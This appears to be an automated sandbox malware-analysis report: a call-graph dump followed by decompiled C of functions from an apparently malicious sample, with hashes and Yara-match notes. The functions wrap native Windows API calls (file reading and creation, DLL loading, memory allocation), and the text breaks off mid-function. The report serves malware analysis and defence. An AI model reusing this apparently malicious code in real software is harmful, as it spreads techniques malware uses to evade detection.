47363 41a400 2 API calls 47359->47363 47361 4150c5 47360->47361 47361->47294 47365 4150df 47362->47365 47364 415229 47363->47364 47364->47294 47365->47294 47368 415157 47370 41516e 47368->47370 47405 41a210 LdrLoadDll 47368->47405 47376 415103 47369->47376 47397 41a380 47369->47397 47372 415175 47370->47372 47373 41518a 47370->47373 47374 41a400 2 API calls 47372->47374 47375 41a400 2 API calls 47373->47375 47374->47376 47377 415193 47375->47377 47376->47294 47378 4151bf 47377->47378 47400 41bc70 47377->47400 47378->47294 47380 4151aa 47381 41bea0 2 API calls 47380->47381 47382 4151b3 47381->47382 47382->47294 47383->47262 47384->47287 47386 415904 47385->47386 47387 41af20 LdrLoadDll 47385->47387 47388 41a290 LdrLoadDll NtCreateFile 47386->47388 47387->47386 47388->47292 47390 41af20 LdrLoadDll 47389->47390 47391 41a41c NtClose 47390->47391 47391->47295 47392->47275 47393->47339 47396 41c088 47394->47396 47407 41a5a0 47394->47407 47396->47369 47398 41af20 LdrLoadDll 47397->47398 47399 41a39c NtReadFile 47398->47399 47399->47368 47401 41bc94 47400->47401 47402 41bc7d 47400->47402 47401->47380 47402->47401 47403 41c070 2 API calls 47402->47403 47404 41bcab 47403->47404 47404->47380 47405->47370 47406->47359 47408 41af20 LdrLoadDll 47407->47408 47409 41a5bc RtlAllocateHeap 47408->47409 47409->47396 47411 41be4d 47410->47411 47541 41a4b0 47410->47541 47411->47300 47414 414c71 47413->47414 47416 414c79 47413->47416 47414->47302 47415 414f4c 47415->47302 47416->47415 47544 41d050 47416->47544 47418 414ccd 47419 41d050 2 API calls 47418->47419 47422 414cd8 47419->47422 47420 414d26 47423 41d050 2 API calls 47420->47423 47422->47420 47424 41d180 3 API calls 47422->47424 47555 41d0f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 47422->47555 47426 414d3a 47423->47426 47424->47422 47425 414d97 47427 41d050 2 API calls 47425->47427 47426->47425 47549 41d180 47426->47549 47429 414dad 47427->47429 47430 414dea 47429->47430 47433 41d180 3 API calls 47429->47433 47431 41d050 2 API calls 47430->47431 47432 414df5 47431->47432 47434 41d180 3 API calls 47432->47434 47441 414e2f 47432->47441 47433->47429 47434->47432 47436 414f24 47557 41d0b0 LdrLoadDll RtlFreeHeap 47436->47557 47438 414f2e 47558 41d0b0 LdrLoadDll RtlFreeHeap 47438->47558 47440 414f38 47559 41d0b0 LdrLoadDll RtlFreeHeap 47440->47559 47556 41d0b0 LdrLoadDll RtlFreeHeap 47441->47556 47443 414f42 47560 41d0b0 LdrLoadDll RtlFreeHeap 47443->47560 47446 415f91 47445->47446 47447 415640 9 API calls 47446->47447 47449 415fa7 47447->47449 47448 415fb0 47448->47306 47449->47448 47450 415fe7 47449->47450 47453 416033 47449->47453 47451 41bea0 2 API calls 47450->47451 47452 415ff8 47451->47452 47452->47306 47454 41bea0 2 API calls 47453->47454 47455 416038 47454->47455 47455->47306 47561 41aba0 47456->47561 47458 41ad24 47459 41aba0 LdrLoadDll 47458->47459 47460 41ad2d 47459->47460 47461 41aba0 LdrLoadDll 47460->47461 47462 41ad36 47461->47462 47463 41aba0 LdrLoadDll 47462->47463 47464 41ad3f 47463->47464 47465 41aba0 LdrLoadDll 47464->47465 47466 41ad48 47465->47466 47467 41aba0 LdrLoadDll 47466->47467 47468 41ad51 47467->47468 47469 41aba0 LdrLoadDll 47468->47469 47470 41ad5d 47469->47470 47471 41aba0 LdrLoadDll 47470->47471 47472 41ad66 47471->47472 47473 41aba0 LdrLoadDll 47472->47473 47474 41ad6f 47473->47474 47475 41aba0 LdrLoadDll 47474->47475 47476 41ad78 47475->47476 47477 41aba0 LdrLoadDll 47476->47477 47478 41ad81 47477->47478 47479 41aba0 LdrLoadDll 47478->47479 47480 41ad8a 47479->47480 47481 41aba0 LdrLoadDll 47480->47481 47482 41ad96 47481->47482 47483 41aba0 LdrLoadDll 47482->47483 47484 41ad9f 47483->47484 47485 41aba0 LdrLoadDll 47484->47485 47486 41ada8 47485->47486 47487 41aba0 LdrLoadDll 47486->47487 47488 41adb1 47487->47488 47489 41aba0 LdrLoadDll 47488->47489 47490 41adba 47489->47490 47491 41aba0 LdrLoadDll 47490->47491 47492 41adc3 47491->47492 47493 41aba0 LdrLoadDll 47492->47493 47494 41adcf 47493->47494 47495 41aba0 LdrLoadDll 47494->47495 47496 41add8 47495->47496 47497 41aba0 LdrLoadDll 47496->47497 47498 41ade1 47497->47498 47499 41aba0 LdrLoadDll 47498->47499 47500 41adea 47499->47500 47501 41aba0 LdrLoadDll 47500->47501 47502 41adf3 47501->47502 47503 41aba0 LdrLoadDll 47502->47503 47504 41adfc 47503->47504 47505 41aba0 LdrLoadDll 47504->47505 47506 41ae08 47505->47506 47507 41aba0 LdrLoadDll 47506->47507 47508 41ae11 47507->47508 47509 41aba0 LdrLoadDll 47508->47509 47510 41ae1a 47509->47510 47511 41aba0 LdrLoadDll 47510->47511 47512 41ae23 47511->47512 47513 41aba0 LdrLoadDll 47512->47513 47514 41ae2c 47513->47514 47515 41aba0 LdrLoadDll 47514->47515 47516 41ae35 47515->47516 47517 41aba0 LdrLoadDll 47516->47517 47518 41ae41 47517->47518 47519 41aba0 LdrLoadDll 47518->47519 47520 41ae4a 47519->47520 47521 41aba0 LdrLoadDll 47520->47521 47522 41ae53 47521->47522 47523 41aba0 LdrLoadDll 47522->47523 47524 41ae5c 47523->47524 47525 41aba0 LdrLoadDll 47524->47525 47526 41ae65 47525->47526 47527 41aba0 LdrLoadDll 47526->47527 47528 41ae6e 47527->47528 47529 41aba0 LdrLoadDll 47528->47529 47530 41ae7a 47529->47530 47531 41aba0 LdrLoadDll 47530->47531 47532 41ae83 47531->47532 47533 41aba0 LdrLoadDll 47532->47533 47534 41ae8c 47533->47534 47534->47310 47536 41af20 LdrLoadDll 47535->47536 47537 419e4c 47536->47537 47567 85fdc0 LdrInitializeThunk 47537->47567 47538 419e63 47538->47231 47540->47307 47542 41a4cc NtAllocateVirtualMemory 47541->47542 47543 41af20 LdrLoadDll 47541->47543 47542->47411 47543->47542 47545 41d060 47544->47545 47546 41d066 47544->47546 47545->47418 47547 41c070 2 API calls 47546->47547 47548 41d08c 47547->47548 47548->47418 47550 41d0f0 47549->47550 47551 41c070 2 API calls 47550->47551 47554 41d14d 47550->47554 47552 41d12a 47551->47552 47553 41bea0 2 API calls 47552->47553 47553->47554 47554->47426 47555->47422 47556->47436 47557->47438 47558->47440 47559->47443 47560->47415 47562 41abbb 47561->47562 47563 415a40 LdrLoadDll 47562->47563 47565 41abdb 47563->47565 47564 41ac8f 47564->47458 47565->47564 47566 415a40 LdrLoadDll 47565->47566 47566->47564 47567->47538 47568->47316 47570 41af20 LdrLoadDll 47569->47570 47571 41a5fc RtlFreeHeap 47570->47571 47571->47320 47573 4071d0 47572->47573 47574 4071cb 47572->47574 47575 41be20 2 API calls 47573->47575 47574->47239 47578 4071f5 47575->47578 47576 407258 47576->47239 47577 419e30 2 API calls 47577->47578 47578->47576 47578->47577 47579 40725e 47578->47579 47583 41be20 2 API calls 47578->47583 47588 41a530 47578->47588 47581 407284 47579->47581 47582 41a530 2 API calls 47579->47582 47581->47239 47584 407275 47582->47584 47583->47578 47584->47239 47586 40749e 47585->47586 47587 41a530 2 API calls 47585->47587 47586->47199 47587->47586 47589 41a54c 47588->47589 47590 41af20 LdrLoadDll 47588->47590 47593 85fb68 LdrInitializeThunk 47589->47593 47590->47589 47591 41a563 47591->47578 47593->47591 47595 41b5e3 47594->47595 47598 40a0e0 47595->47598 47599 40a104 47598->47599 47600 40900a 47599->47600 47601 40a14d LdrLoadDll 47599->47601 47600->47206 47601->47600 47603 40a453 47602->47603 47604 40a4d0 47603->47604 47617 419c00 LdrLoadDll 47603->47617 47604->47213 47607 41af20 LdrLoadDll 47606->47607 47608 40d54b 47607->47608 47608->47216 47609 41a740 47608->47609 47610 41af20 LdrLoadDll 47609->47610 47611 41a75f LookupPrivilegeValueW 47610->47611 47611->47218 47613 41af20 LdrLoadDll 47612->47613 47614 41a1ec 47613->47614 47618 85fed0 LdrInitializeThunk 47614->47618 47615 41a20b 47615->47219 47617->47604 47618->47615 47620 40a5d7 47619->47620 47621 40a430 LdrLoadDll 47620->47621 47622 40a606 47621->47622 47622->47142 47624 40d63a 47623->47624 47632 40d6f0 47623->47632 47625 40a430 LdrLoadDll 47624->47625 47626 40d65c 47625->47626 47633 419eb0 47626->47633 47628 40d69e 47636 419ef0 47628->47636 47631 41a400 2 API calls 47631->47632 47632->47145 47632->47146 47634 41af20 LdrLoadDll 47633->47634 47635 419ecc 47634->47635 47635->47628 47637 41af20 LdrLoadDll 47636->47637 47638 419f0c 47637->47638 47641 8607ac LdrInitializeThunk 47638->47641 47639 40d6e4 47639->47631 47641->47639 47643 40a241 47642->47643 47644 40a23d 47642->47644 47645 40a25a 47643->47645 47646 40a28c 47643->47646 47644->47157 47698 419c40 LdrLoadDll 47645->47698 47699 419c40 LdrLoadDll 47646->47699 47648 40a29d 47648->47157 47650 40a27c 47650->47157 47652 40d7a0 3 API calls 47651->47652 47653 414fb6 47652->47653 47653->47159 47655 407dde 47654->47655 47657 407e8c 47654->47657 47656 4071c0 4 API calls 47655->47656 47662 407de8 47656->47662 47658 4071c0 4 API calls 47657->47658 47661 407f6a 47657->47661 47670 407f4c 47657->47670 47663 407ead 47658->47663 47660 407f60 47660->47161 47661->47161 47662->47657 47666 407e82 47662->47666 47700 407ac0 47662->47700 47665 407ac0 18 API calls 47663->47665 47668 407f42 47663->47668 47663->47670 47665->47663 47667 407480 2 API calls 47666->47667 47667->47657 47669 407480 2 API calls 47668->47669 47669->47670 47670->47661 47733 40da10 11 API calls 47670->47733 47672 41af20 LdrLoadDll 47671->47672 47673 41a48c 47672->47673 47873 85fea0 LdrInitializeThunk 47673->47873 47674 40ad12 47676 40d7a0 47674->47676 47677 40d7bd 47676->47677 47874 419f30 47677->47874 47680 40d805 47680->47165 47681 419f80 2 API calls 47682 40d82e 47681->47682 47682->47165 47684 419f9c 47683->47684 47685 41af20 LdrLoadDll 47683->47685 47880 85fc60 LdrInitializeThunk 47684->47880 47685->47684 47686 40ad75 47686->47171 47686->47174 47689 41af20 LdrLoadDll 47688->47689 47690 419fec 47689->47690 47881 85fc90 LdrInitializeThunk 47690->47881 47691 40ae49 47691->47182 47694 41af20 LdrLoadDll 47693->47694 47695 419dac 47694->47695 47882 860078 LdrInitializeThunk 47695->47882 47696 40ae9c 47696->47186 47698->47650 47699->47648 47701 407ae5 47700->47701 47734 419c80 47701->47734 47704 407b39 47704->47662 47705 407bba 47770 40d8f0 LdrLoadDll NtClose 47705->47770 47706 419e70 2 API calls 47707 407b5d 47706->47707 47707->47705 47709 407b68 47707->47709 47711 407be6 47709->47711 47738 40aeb0 47709->47738 47710 407bd5 47712 407bf2 47710->47712 47713 407bdc 47710->47713 47711->47662 47771 419d00 LdrLoadDll 47712->47771 47715 41a400 2 API calls 47713->47715 47715->47711 47716 407b82 47716->47711 47758 4078f0 47716->47758 47718 407c1d 47720 40aeb0 5 API calls 47718->47720 47722 407c3d 47720->47722 47722->47711 47772 419d30 LdrLoadDll 47722->47772 47724 407c62 47773 419dc0 LdrLoadDll 47724->47773 47726 407c7c 47727 419d90 2 API calls 47726->47727 47728 407c8b 47727->47728 47729 41a400 2 API calls 47728->47729 47730 407c95 47729->47730 47774 4076c0 47730->47774 47732 407ca9 47732->47662 47733->47660 47735 419c95 47734->47735 47736 41af20 LdrLoadDll 47735->47736 47737 407b2f 47736->47737 47737->47704 47737->47705 47737->47706 47740 40aedb 47738->47740 47739 40d7a0 3 API calls 47741 40af3a 47739->47741 47740->47739 47742 419f80 2 API calls 47741->47742 47751 40af83 47741->47751 47743 40af65 47742->47743 47744 40af6c 47743->47744 47747 40af8f 47743->47747 47745 419fd0 2 API calls 47744->47745 47746 40af79 47745->47746 47748 41a400 2 API calls 47746->47748 47749 40aff9 47747->47749 47750 40afd9 47747->47750 47748->47751 47753 419fd0 2 API calls 47749->47753 47752 41a400 2 API calls 47750->47752 47751->47716 47755 40afe6 47752->47755 47754 40b00b 47753->47754 47756 41a400 2 API calls 47754->47756 47755->47716 47757 40b015 47756->47757 47757->47716 47759 407906 47758->47759 47790 4197f0 47759->47790 47761 407a91 47761->47662 47762 40791f 47762->47761 47811 4074c0 47762->47811 47764 407a05 47764->47761 47765 4076c0 12 API calls 47764->47765 47766 407a33 47765->47766 47766->47761 47767 419e70 2 API calls 47766->47767 47768 407a68 47767->47768 47768->47761 47769 41a470 2 API calls 47768->47769 47769->47761 47770->47710 47771->47718 47772->47724 47773->47726 47775 4076e9 47774->47775 47851 407630 47775->47851 47778 41a470 2 API calls 47779 4076fc 47778->47779 47779->47778 47780 407787 47779->47780 47782 407782 47779->47782 47859 40d970 47779->47859 47780->47732 47781 41a400 2 API calls 47783 4077ba 47781->47783 47782->47781 47783->47780 47784 419c80 LdrLoadDll 47783->47784 47785 40781f 47784->47785 47785->47780 47863 419cc0 47785->47863 47787 407883 47787->47780 47788 415640 9 API calls 47787->47788 47789 4078d8 47788->47789 47789->47732 47791 41c070 2 API calls 47790->47791 47792 419807 47791->47792 47818 408710 47792->47818 47794 419822 47795 419860 47794->47795 47796 419849 47794->47796 47799 41be20 2 API calls 47795->47799 47797 41bea0 2 API calls 47796->47797 47798 419856 47797->47798 47798->47762 47800 41989a 47799->47800 47801 41be20 2 API calls 47800->47801 47802 4198b3 47801->47802 47808 419b54 47802->47808 47824 41be60 47802->47824 47805 419b40 47806 41bea0 2 API calls 47805->47806 47807 419b4a 47806->47807 47807->47762 47809 41bea0 2 API calls 47808->47809 47810 419ba9 47809->47810 47810->47762 47812 4075bf 47811->47812 47814 4074d5 47811->47814 47812->47764 47813 415640 9 API calls 47815 407542 47813->47815 47814->47812 47814->47813 47816 41bea0 2 API calls 47815->47816 47817 407569 47815->47817 47816->47817 47817->47764 47819 408735 47818->47819 47820 40a0e0 LdrLoadDll 47819->47820 47821 408768 47820->47821 47823 40878d 47821->47823 47827 40b8e0 47821->47827 47823->47794 47845 41a4f0 47824->47845 47828 40b90c 47827->47828 47829 41a150 LdrLoadDll 47828->47829 47830 40b925 47829->47830 47831 40b92c 47830->47831 47838 41a190 47830->47838 47831->47823 47835 40b967 47836 41a400 2 API calls 47835->47836 47837 40b98a 47836->47837 47837->47823 47839 41af20 LdrLoadDll 47838->47839 47840 41a1ac 47839->47840 47844 85fbb8 LdrInitializeThunk 47840->47844 47841 40b94f 47841->47831 47843 41a780 LdrLoadDll 47841->47843 47843->47835 47844->47841 47846 41af20 LdrLoadDll 47845->47846 47847 41a50c 47846->47847 47850 860048 LdrInitializeThunk 47847->47850 47848 419b39 47848->47805 47848->47808 47850->47848 47852 407648 47851->47852 47853 40a0e0 LdrLoadDll 47852->47853 47854 407663 47853->47854 47855 415a40 LdrLoadDll 47854->47855 47856 407673 47855->47856 47857 40767c PostThreadMessageW 47856->47857 47858 407690 47856->47858 47857->47858 47858->47779 47860 40d983 47859->47860 47867 419e00 47860->47867 47864 419cd6 47863->47864 47865 41af20 LdrLoadDll 47864->47865 47866 419cdc 47865->47866 47866->47787 47868 419e1c 47867->47868 47869 41af20 LdrLoadDll 47867->47869 47872 85fd8c LdrInitializeThunk 47868->47872 47869->47868 47870 40d9ae 47870->47779 47872->47870 47873->47674 47875 41af20 LdrLoadDll 47874->47875 47876 419f4c 47875->47876 47879 85ffb4 LdrInitializeThunk 47876->47879 47877 40d7fe 47877->47680 47877->47681 47879->47877 47880->47686 47881->47691 47882->47696 47885 85f9f0 LdrInitializeThunk

                                                        Executed Functions

                                                        Function 0041A380 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 41a380-41a3c9 call 41af20 NtReadFile
                                                        C-Code - Quality: 37%
                                                        			E0041A380(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				E0041AF20( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t4 =  &_a40; // 0x415621
				_t6 =  &_a32; // 0x415962
				_t12 =  &_a8; // 0x415962
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}





                                                        0x0041a383
                                                        0x0041a38f
                                                        0x0041a397
                                                        0x0041a39c
                                                        0x0041a3a2
                                                        0x0041a3bd
                                                        0x0041a3c5
                                                        0x0041a3c9

                                                        APIs
                                                        • NtReadFile.NTDLL(bYA,5DB515AF,FFFFFFFF,?,?,?,bYA,?,!VA,FFFFFFFF,5DB515AF,00415962,?,00000000), ref: 0041A3C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: !VA$bYA$bYA
                                                        • API String ID: 2738559852-1892722986
                                                        • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                        • Instruction ID: a082e577e587f18bad2a0ac2af42633e1a6d87433a9ff8ac06d3019b9616f73f
                                                        • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                        • Instruction Fuzzy Hash: 62F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F118249BA0D97241D630E811CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A28A Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 227 41a28a-41a28f 228 41a291-41a2c9 call 41af20 227->228 229 41a2e6-41a321 call 41af20 NtCreateFile 227->229 228->229
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,004090B3,?,004157A7,004090B3,FFFFFFFF,?,?,FFFFFFFF,004090B3,004157A7,?,004090B3,00000060,00000000,00000000), ref: 0041A31D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 67b207398dec21cea9c5f2fdcc8201dcaed53f7e534dc20bd5e479b03b2dd50c
                                                        • Instruction ID: 1dfaf056c71c304fbd68e1a8a8bc5405c5af5c9ae836129a1c918a3199dc8486
                                                        • Opcode Fuzzy Hash: 67b207398dec21cea9c5f2fdcc8201dcaed53f7e534dc20bd5e479b03b2dd50c
                                                        • Instruction Fuzzy Hash: 7011C2B2205108ABCB18DF88DC85DEB77ADEF8C754F108509FA0D97241D634E861CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A0E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 40a0e0-40a109 call 41cd70 270 40a10b-40a10e 267->270 271 40a10f-40a11d call 41d190 267->271 274 40a12d-40a13e call 41b4c0 271->274 275 40a11f-40a12a call 41d410 271->275 280 40a140-40a154 LdrLoadDll 274->280 281 40a157-40a15a 274->281 275->274 280->281
                                                        C-Code - Quality: 100%
                                                        			E0040A0E0(void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041CD70(__edi,  &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D190(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D410( &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041B4C0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                        0x0040a0fc
                                                        0x0040a0ff
                                                        0x0040a104
                                                        0x0040a109
                                                        0x0040a113
                                                        0x0040a118
                                                        0x0040a11b
                                                        0x0040a11d
                                                        0x0040a125
                                                        0x0040a12a
                                                        0x0040a12a
                                                        0x0040a131
                                                        0x0040a139
                                                        0x0040a13c
                                                        0x0040a13e
                                                        0x0040a152
                                                        0x00000000
                                                        0x0040a154
                                                        0x0040a15a
                                                        0x0040a10e
                                                        0x0040a10e
                                                        0x0040a10e

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A152
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction ID: 2d0d09612ad2a2ca92ab0b29bd402b5d77c55f859f0073fa60504bb5a6634220
                                                        • Opcode Fuzzy Hash: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction Fuzzy Hash: 700112B5E4020DB7DB10DAA5DC42FDEB7789B5430CF0041A5E908AB281F675EB548795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A2CA Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 41a2ca-41a321 call 41af20 NtCreateFile
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,004090B3,?,004157A7,004090B3,FFFFFFFF,?,?,FFFFFFFF,004090B3,004157A7,?,004090B3,00000060,00000000,00000000), ref: 0041A31D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 56e90ec9e11605159a42278ee2eca9c803995f10a29f51cef008025b78b3b3ed
                                                        • Instruction ID: 4374f9253818ac73a4fe39cf2d80c1c6e60e079c2ea04d7cd97a0ea02a98d132
                                                        • Opcode Fuzzy Hash: 56e90ec9e11605159a42278ee2eca9c803995f10a29f51cef008025b78b3b3ed
                                                        • Instruction Fuzzy Hash: 7401A4B2201108AFCB48CF98DC85DEB37A9AF8C354F118259FA0DD7251D630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A2D0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 287 41a2d0-41a321 call 41af20 NtCreateFile
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,004090B3,?,004157A7,004090B3,FFFFFFFF,?,?,FFFFFFFF,004090B3,004157A7,?,004090B3,00000060,00000000,00000000), ref: 0041A31D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                        • Instruction ID: 9d1c7a99673d815193090eb3c7df6778cdc506c0404e130a1c4c2daf2453d359
                                                        • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                        • Instruction Fuzzy Hash: B1F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118249BA0997241D630F8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A4AA Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 291 41a4aa-41a4ed call 41af20 NtAllocateVirtualMemory
                                                        C-Code - Quality: 79%
                                                        			E0041A4AA(void* __esi, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t14;

				_t10 = _a8;
				_push(0xec8b558a);
				_t3 = _t10 + 0xc7c; // 0x3c7c
				E0041AF20( *((intOrPtr*)(_a8 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t14;
			}




                                                        0x0041a4b3
                                                        0x0041a4b9
                                                        0x0041a4bf
                                                        0x0041a4c7
                                                        0x0041a4e9
                                                        0x0041a4ed

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B15D,?,0041B15D,?,00000000,?,00003000,00000040,004090B3,00000000), ref: 0041A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b6012610b3534ab578e955300fa2c9147cf21ce4007fff8bd81e7b134cec30f3
                                                        • Instruction ID: e6a59205a01b9863badca04a1f4de8256db2c4ff87b2762c25fc6340aa599850
                                                        • Opcode Fuzzy Hash: b6012610b3534ab578e955300fa2c9147cf21ce4007fff8bd81e7b134cec30f3
                                                        • Instruction Fuzzy Hash: 35F0F8B6210114AFDB14DF99DC81EE777A9EF88354F11814AFE59A7241C630E811CBE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A4B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 41a4b0-41a4c6 295 41a4cc-41a4ed NtAllocateVirtualMemory 294->295 296 41a4c7 call 41af20 294->296 296->295
                                                        C-Code - Quality: 100%
                                                        			E0041A4B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF20( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                        0x0041a4bf
                                                        0x0041a4c7
                                                        0x0041a4e9
                                                        0x0041a4ed

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B15D,?,0041B15D,?,00000000,?,00003000,00000040,004090B3,00000000), ref: 0041A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                        • Instruction ID: 1a7d6a8cb6469f78efe4d9f6d69158b31777733b6dc10b35fa3ec10f3d4aa708
                                                        • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                        • Instruction Fuzzy Hash: 67F015B2210208ABDB14DF89DC81EEB77ADAF8C754F018109BE0897241C630F811CBB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A400 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A400(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
